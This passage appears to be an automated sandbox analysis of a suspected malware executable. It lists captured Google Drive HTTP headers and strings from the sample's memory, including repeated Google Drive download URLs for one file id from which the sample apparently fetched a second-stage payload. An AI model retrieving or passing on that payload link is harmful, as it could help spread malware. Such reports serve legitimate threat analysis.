/_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSq6ud_327R7xOMjGPXJwHGdAmG87EX8cjiSO49oI7NbwnaQ7lFhgWvUv_cy1t7NTyuhDkZK7EContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:15:24 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-0caRob6R8X__-ngXWLX0Kg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5HpEDFlNl_sVXkrI_HxMYa_wWbg_RuyUaMYs-q7tV_i2PoLblnkXgfaeHsY65fH1_qXIcgRJ0Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Sat, 11 Jan 2025 04:15:36 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-huVe7-4IFBVgTTNQZDWENQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: QNuQ5e175D.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039C1000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605627561.0000000003A20000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039A8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://dhttps://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=d
      Source: QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/-
      Source: QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/BA90920B1
      Source: QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadA98
      Source: QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloade
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadf
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadoogle
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/E_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadt
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/F4409BC0D96FBCBDDEEE6C0AFBF
      Source: QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/e
      Source: QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ertificates
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/s
      Source: QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/sr
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039A8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569724783.0000000005510000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-MZ
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039A8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-Mvr
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2007544968.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/0
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.0000000003968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=download
      Source: QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadA9
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadFB
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.0000000003968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadIM
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2007544968.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2117883344.00000000039E5000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadJ
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.0000000003968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadMJ
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloade
      Source: QNuQ5e175D.exe, 00000004.00000002.3569389730.00000000039D8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1QcE_NzIJ0Otlo3020Ku5mJyfAs6YSv-M&export=downloadep
      Source: QNuQ5e175D.exe, 00000004.00000003.2361334924.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128656586.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240155348.00000000039E3000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2372316393.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2128689468.00000000039E4000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2495233223.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2726695465.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2848012889.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2605737447.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2616356320.00000000039DC000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2737528794.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2858855756.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2240128134.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2483912865.00000000039DF000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2969547485.00000000039DD000.00000004.00000020.00020000.00000000.sdmp, QNuQ5e175D.exe, 00000004.00000003.2250724175.00000000039DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 